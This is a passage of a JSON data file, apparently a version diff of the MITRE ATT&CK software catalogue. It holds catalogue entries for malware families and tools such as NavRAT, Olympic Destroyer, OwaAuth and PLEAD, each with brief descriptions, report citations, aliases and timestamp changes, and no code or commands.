Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + }, + { + "source_name": "SentinelOne NobleBaron June 2021", + "description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.", + "url": "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NativeZone" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:28.081000+00:00\", \"old_value\": \"2025-04-16 20:38:31.174000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--53a42597-1974-4b8e-84fd-3675e8992053", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:20.237000+00:00", + "name": "NavRAT", + "description": "[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. 
(Citation: Talos NavRAT May 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0247", + "external_id": "S0247" + }, + { + "source_name": "NavRAT", + "description": "(Citation: Talos NavRAT May 2018)" + }, + { + "source_name": "Talos NavRAT May 2018", + "description": "Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.", + "url": "https://blog.talosintelligence.com/2018/05/navrat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NavRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:20.237000+00:00\", \"old_value\": \"2025-04-16 20:38:07.899000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-30 14:44:35.055000+00:00", + "modified": "2025-04-25 14:42:50.875000+00:00", + "name": "Nebulae", + "description": "[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0630", + "external_id": "S0630" + }, + { + "source_name": 
"Bitdefender Naikon April 2021", + "description": "Vrabie, V. (2021, April 23). NAIKON \u2013 Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Nebulae" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:50.875000+00:00\", \"old_value\": \"2025-04-16 20:37:58.683000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f6d1d2cb-12f5-4221-9636-44606ea1f3f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:06.283000+00:00", + "name": "OSInfo", + "description": "[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0165", + "external_id": "S0165" + }, + { + "source_name": "Symantec Buckeye", + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. 
Retrieved September 26, 2016.", + "url": "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OSInfo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:06.283000+00:00\", \"old_value\": \"2025-04-16 20:38:43.861000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5864e59f-eb4c-43ad-83b2-b5e4fae056c9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-08 19:53:27.937000+00:00", + "modified": "2025-04-25 14:43:25.456000+00:00", + "name": "ObliqueRAT", + "description": "[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0644", + "external_id": "S0644" + }, + { + "source_name": "Talos Oblique RAT March 2021", + "description": "Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. 
Retrieved September 2, 2021.", + "url": "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html" + }, + { + "source_name": "Talos Transparent Tribe May 2021", + "description": "Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.", + "url": "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ObliqueRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:25.456000+00:00\", \"old_value\": \"2025-04-16 20:38:09.744000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--288fa242-e894-4c7e-ac86-856deedf5cea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 15:43:19.105000+00:00", + "modified": "2025-04-25 14:42:52.708000+00:00", + "name": "OceanSalt", + "description": "[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. 
[OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0346", + "external_id": "S0346" + }, + { + "source_name": "OceanSalt", + "description": "(Citation: McAfee Oceansalt Oct 2018)" + }, + { + "source_name": "McAfee Oceansalt Oct 2018", + "description": "Sherstobitoff, R., Malhotra, A. (2018, October 18). \u2018Operation Oceansalt\u2019 Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OceanSalt" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:52.708000+00:00\", \"old_value\": \"2025-04-16 20:37:59.147000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-06 21:12:31.535000+00:00", + "modified": "2025-04-25 14:43:14.113000+00:00", + "name": "Okrum", + "description": "[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 
with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0439", + "external_id": "S0439" + }, + { + "source_name": "ESET Okrum July 2019", + "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Okrum" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:14.113000+00:00\", \"old_value\": \"2025-04-16 20:38:05.946000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3249e92a-870b-426d-8790-ba311c1abfb4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-25 14:07:22.547000+00:00", + "modified": "2025-04-25 14:42:59.783000+00:00", + "name": "Olympic Destroyer", + "description": "[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. 
The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0365", + "external_id": "S0365" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. 
Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Olympic Destroyer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:59.783000+00:00\", \"old_value\": \"2025-04-16 20:38:01.435000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--b136d088-a829-432c-ac26-5529c26d4c7e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:37.341000+00:00", + "modified": "2025-04-25 14:44:25.559000+00:00", + "name": "OnionDuke", + "description": "[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0052", + "external_id": "S0052" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. 
Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OnionDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:25.559000+00:00\", \"old_value\": \"2025-04-16 20:38:30.711000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--8e101fdd-9f7f-4916-bb04-6bd9e94c129c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:01.012000+00:00", + "name": "OopsIE", + "description": "[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0264", + "external_id": "S0264" + }, + { + "source_name": "OopsIE", + "description": "(Citation: Unit 42 OopsIE! Feb 2018) (Citation: Unit 42 OilRig Sept 2018)" + }, + { + "source_name": "Unit 42 OopsIE! Feb 2018", + "description": "Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. 
Retrieved July 16, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" + }, + { + "source_name": "Unit 42 OilRig Sept 2018", + "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OopsIE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:01.012000+00:00\", \"old_value\": \"2025-04-16 20:38:21.971000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "tool", + "id": "tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-19 13:11:50.666000+00:00", + "modified": "2025-04-25 14:45:22.072000+00:00", + "name": "Out1", + "description": "[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0594", + "external_id": "S0594" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. 
and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Out1" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:22.072000+00:00\", \"old_value\": \"2025-04-16 20:38:53.377000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a60657fa-e2e7-4f8f-8128-a882534ae8c5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:47.412000+00:00", + "modified": "2025-04-25 14:44:19.163000+00:00", + "name": "OwaAuth", + "description": "[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0072", + "external_id": "S0072" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. 
Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OwaAuth" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:19.163000+00:00\", \"old_value\": \"2025-04-16 20:38:28.901000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--4800d0f9-00aa-47cd-a4d2-92198585b8fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13 12:46:58.579000+00:00", + "modified": "2025-04-25 14:43:11.044000+00:00", + "name": "P.A.S. Webshell", + "description": "[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0598", + "external_id": "S0598" + }, + { + "source_name": "Fobushell", + "description": "(Citation: NCCIC AR-17-20045 February 2017)" + }, + { + "source_name": "ANSSI Sandworm January 2021", + "description": "ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. 
Retrieved March 30, 2021.", + "url": "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" + }, + { + "source_name": "NCCIC AR-17-20045 February 2017", + "description": "NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "P.A.S. Webshell", + "Fobushell" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:11.044000+00:00\", \"old_value\": \"2025-04-16 20:38:05.296000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--7c58fff0-d206-4db1-96b1-e3a9e0e320b9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-21 15:02:47.928000+00:00", + "modified": "2025-04-25 14:43:50.562000+00:00", + "name": "P8RAT", + "description": "[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0626", + "external_id": "S0626" + }, + { + "source_name": "HEAVYPOT", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "GreetCake", + "description": 
"(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "P8RAT", + "HEAVYPOT", + "GreetCake" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:50.562000+00:00\", \"old_value\": \"2025-04-16 20:38:19.073000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f6ae7a52-f3b6-4525-9daf-640c083f006e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:45:05.924000+00:00", + "name": "PHOREAL", + "description": "[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0158", + "external_id": "S0158" + }, + { + "source_name": "PHOREAL", + "description": "(Citation: FireEye APT32 May 2017)" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). 
Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PHOREAL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:05.924000+00:00\", \"old_value\": \"2025-04-16 20:38:43.708000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:49.775000+00:00", + "name": "PLAINTEE", + "description": "[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0254", + "external_id": "S0254" + }, + { + "source_name": "PLAINTEE", + "description": "(Citation: Rancor Unit42 June 2018)" + }, + { + "source_name": "Rancor Unit42 June 2018", + "description": "Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. 
Retrieved July 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PLAINTEE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:49.775000+00:00\", \"old_value\": \"2025-04-16 20:37:58.191000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b57f419e-8b12-49d3-886b-145383725dcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-06 12:55:10.969000+00:00", + "modified": "2025-04-25 19:04:32.446000+00:00", + "name": "PLEAD", + "description": "[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as 